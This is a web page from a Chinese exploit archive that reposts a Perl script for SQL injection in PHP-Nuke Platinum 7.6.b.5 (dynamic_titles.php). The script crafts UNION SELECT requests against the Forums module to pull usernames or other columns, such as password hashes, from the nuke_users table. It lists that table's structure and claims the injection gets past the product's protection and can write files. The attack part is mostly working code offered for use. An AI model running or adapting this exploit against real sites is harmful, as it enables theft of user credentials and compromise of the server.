首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection Exploit
来源:www.vfocus.net 作者:vfocus 发布时间:2008-03-25  

#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id        name    username        user_email      femail  user_website    user_avatar     user_regdate    user_icq        use
r_occ   user_from       user_interests  user_sig        user_viewemail  user_theme      user_aim        user_yim        user_msnm
user_password   storynum        umode   uorder  thold   noscore         bio     ublockon        ublock  theme   commentmax      cou
nter    newsletter      user_posts      user_attachsig  user_rank       user_level      broadcast       popmeson        user_active
        user_session_time       user_session_page       user_lastvisit  user_timezone   user_style      user_lang       user_datefo
rmatuser_new_privmsg    user_unread_privmsg     user_last_privmsg       user_emailtime  user_allowhtml  user_allowbbcode        use
r_allowsmile    user_allowavatar        user_allow_pm   user_allow_viewonline   user_notify     user_notify_pm  user_popup_pm   use
r_avatar_type   user_sig_bbcode_uid user_actkey         user_newpasswd  last_ip         user_color_gc   user_color_gi   user_quickr
eply    user_allow_arcadepm     kick_ban        user_wordwrap   agreedtos       user_view_log   user_effects    user_privs      use
r_custitle      user_specmsg    user_items      user_trade      points  user_cash       last_seen_blocker       user_login_tries
user_last_login_try     user_gender     user_birthday   user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach  (@ARGV) {
        $a++;
        while (($k, $v) = each(%cm_n_)) {
                if ($_ eq $k) {
                        ${$v} = $ARGV[$a];
                }
        }
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<ti
tle>(.*?)<\/title>");
sub getit($$)
{
        $url = shift;
        $reg = shift;


        $ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;

        if ($content=~m/$reg/) {
            ($f,$s,$l) = split(">>",$1);
            $s =~s/ Post //;
            print $column.":".$s."\n";
        }
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sun Solaris rpc.ypupdated Arbi
·destar 0.2.2-5 Arbitrary Add N
·PEEL CMS Admin Hash Extraction
·phpBB Module XS-Mod 2.3.1 Loca
·KAPhotoservice (album.asp) Rem
·VLC <= 0.8.6e Subtitle Parsing
·HTTP File Upload ActiveX (UUpl
·win32 Download and Execute She
·Registry Pro (epRegPro.ocx) Re
·MPlayer sdpplin_parse() Array
·Home FTP Server 1.4.5 Remote D
·PacketTrap Networks pt360 2.0.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved